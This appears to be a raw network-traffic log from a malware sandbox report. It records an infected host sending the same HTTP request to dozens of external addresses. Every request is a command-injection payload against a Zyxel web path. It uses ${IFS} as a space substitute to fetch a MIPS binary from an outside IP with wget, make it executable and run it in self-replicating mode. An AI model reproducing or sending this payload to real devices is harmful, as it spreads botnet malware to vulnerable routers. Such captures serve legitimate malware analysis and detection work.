                                        Jan 14, 2024 16:18:54.681514025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6873192.168.2.1356816126.229.13.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.681543112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6874192.168.2.1341274208.219.242.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.681576967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6875192.168.2.135418618.209.223.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.681623936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6876192.168.2.1352752112.119.160.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.681674957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6877192.168.2.1359870143.250.237.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.681718111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6878192.168.2.135323236.191.203.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.681759119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6879192.168.2.1356758202.41.128.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.681797028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6880192.168.2.134433882.21.171.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.681852102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6881192.168.2.1337864164.161.42.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.681905985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6882192.168.2.135507495.38.147.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.681945086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6883192.168.2.1358044212.33.223.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.681977987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6884192.168.2.1354304209.120.226.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682018042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6885192.168.2.134798268.196.10.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682053089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6886192.168.2.134302072.112.207.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682090998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6887192.168.2.134359268.163.171.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682117939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6888192.168.2.1341604157.38.42.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682183981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6889192.168.2.1340232154.96.207.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682212114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6890192.168.2.135837479.140.126.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682244062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6891192.168.2.1354412195.86.55.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682292938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6892192.168.2.1337466109.46.139.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682356119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6893192.168.2.1353882128.178.129.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682394981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6894192.168.2.1335964222.155.249.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682441950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6895192.168.2.1347732109.177.87.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682473898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6896192.168.2.133418852.114.235.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682511091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6897192.168.2.134924249.247.22.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682548046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6898192.168.2.133502273.123.71.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682600975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6899192.168.2.1336706170.108.203.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682636023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6900192.168.2.1343844180.219.172.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682653904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6901192.168.2.135791467.19.224.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682708979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6902192.168.2.134884269.173.232.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682748079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6903192.168.2.1336152172.175.10.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682810068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6904192.168.2.1346150177.247.210.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682841063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6905192.168.2.1350522172.141.16.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682884932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6906192.168.2.1353234223.22.4.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682941914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6907192.168.2.1355024149.148.29.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.682970047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6908192.168.2.134591095.93.99.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683005095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6909192.168.2.1350042168.229.27.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683057070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6910192.168.2.135939494.178.6.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683115005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6911192.168.2.1349018139.93.102.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683162928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6912192.168.2.133721052.158.120.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683195114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6913192.168.2.1334766185.7.172.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683240891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6914192.168.2.135009887.66.45.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683298111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6915192.168.2.1360154155.126.25.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683315992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6916192.168.2.1343082173.94.234.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683386087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6917192.168.2.135211241.107.125.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683423996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6918192.168.2.134967417.192.238.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683454990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6919192.168.2.135598073.0.64.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683495998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6920192.168.2.1348544115.85.218.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683542013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6921192.168.2.13481968.164.104.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683593035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6922192.168.2.1347880169.217.172.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683629036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6923192.168.2.1338832162.237.72.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683669090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6924192.168.2.1351822178.170.181.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683706999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6925192.168.2.134814841.110.81.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683742046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6926192.168.2.1343560180.203.137.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683798075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6927192.168.2.1353730212.92.91.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683825970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6928192.168.2.135882088.40.79.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683859110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6929192.168.2.1355184187.88.165.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683895111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6930192.168.2.135659862.124.236.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683933973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6931192.168.2.135876819.50.142.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.683981895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6932192.168.2.134530053.239.252.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.684022903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6933192.168.2.1352814180.236.78.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.684065104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6934192.168.2.1356612197.96.236.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.684104919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6935192.168.2.1349320176.218.79.233443
                                        TimestampBytes transferredDirectionData
